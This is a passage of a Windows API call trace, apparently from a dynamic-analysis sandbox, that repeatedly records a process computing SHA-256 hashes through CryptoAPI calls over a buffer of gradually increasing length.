	[0225.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779a90
	[0225.028] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779a90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779a90, pdwDataLen=0x128ba4) returned 1
	[0225.028] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.028] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.028] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.029] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.029] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0225.029] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ab8
	[0225.029] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779ab8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ab8, pdwDataLen=0x128ba4) returned 1
	[0225.029] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.029] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.029] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.029] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.029] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0225.029] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ae0
	[0225.029] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779ae0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ae0, pdwDataLen=0x128ba4) returned 1
	[0225.029] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.029] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.029] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.030] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.030] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0225.030] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779b08
	[0225.030] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779b08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779b08, pdwDataLen=0x128ba4) returned 1
	[0225.030] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.030] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.030] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.030] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.030] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0225.030] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779b30
	[0225.030] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779b30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779b30, pdwDataLen=0x128ba4) returned 1
	[0225.030] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.047] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.047] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.047] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.047] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0225.047] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779b58
	[0225.047] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779b58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779b58, pdwDataLen=0x128ba4) returned 1
	[0225.047] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.047] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.047] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.048] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.048] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0225.048] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779b80
	[0225.048] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779b80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779b80, pdwDataLen=0x128ba4) returned 1
	[0225.048] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.048] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.048] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.048] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.048] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0225.048] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ba8
	[0225.048] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779ba8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ba8, pdwDataLen=0x128ba4) returned 1
	[0225.048] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.048] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.048] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.049] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.049] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0225.049] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779bd0
	[0225.049] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779bd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779bd0, pdwDataLen=0x128ba4) returned 1
	[0225.049] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.049] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.049] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.049] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.049] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0225.049] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779bf8
	[0225.049] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779bf8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779bf8, pdwDataLen=0x128ba4) returned 1
	[0225.049] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.049] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.049] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.050] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.050] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0225.050] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779c20
	[0225.050] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779c20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779c20, pdwDataLen=0x128ba4) returned 1
	[0225.050] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.050] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.050] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.050] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.050] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0225.051] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779c48
	[0225.051] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779c48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779c48, pdwDataLen=0x128ba4) returned 1
	[0225.051] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.051] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.051] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.051] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.051] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0225.051] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779c70
	[0225.051] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779c70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779c70, pdwDataLen=0x128ba4) returned 1
	[0225.051] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.051] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.051] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.051] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.052] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0225.052] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779c98
	[0225.052] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779c98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779c98, pdwDataLen=0x128ba4) returned 1
	[0225.052] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.052] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.052] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.052] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.052] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0225.052] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779cc0
	[0225.052] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779cc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779cc0, pdwDataLen=0x128ba4) returned 1
	[0225.052] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.052] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.052] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.053] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.053] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0225.053] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779ce8
	[0225.053] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779ce8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779ce8, pdwDataLen=0x128ba4) returned 1
	[0225.053] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.053] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.053] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.053] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.053] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0225.053] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779d10
	[0225.053] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779d10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779d10, pdwDataLen=0x128ba4) returned 1
	[0225.053] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.053] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.053] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.054] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.054] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0225.054] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779d38
	[0225.054] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779d38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779d38, pdwDataLen=0x128ba4) returned 1
	[0225.054] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.054] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.054] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.054] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.054] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0225.054] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779d60
	[0225.054] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779d60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779d60, pdwDataLen=0x128ba4) returned 1
	[0225.054] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.054] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.054] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.055] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.055] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0225.055] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779d88
	[0225.055] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779d88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779d88, pdwDataLen=0x128ba4) returned 1
	[0225.055] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.055] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.055] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.055] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.055] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0225.055] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779db0
	[0225.055] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779db0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779db0, pdwDataLen=0x128ba4) returned 1
	[0225.055] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.055] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.055] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.056] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.056] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0225.056] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779dd8
	[0225.056] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779dd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779dd8, pdwDataLen=0x128ba4) returned 1
	[0225.056] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.056] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.056] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.056] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.056] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0225.056] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779e00
	[0225.056] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779e00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779e00, pdwDataLen=0x128ba4) returned 1
	[0225.056] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.056] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.056] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.057] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.057] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0225.057] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779e28
	[0225.057] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779e28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779e28, pdwDataLen=0x128ba4) returned 1
	[0225.057] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.057] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.057] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.057] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.057] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0225.057] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779e50
	[0225.057] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779e50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779e50, pdwDataLen=0x128ba4) returned 1
	[0225.057] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.057] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.057] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.058] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.058] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0225.058] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779e78
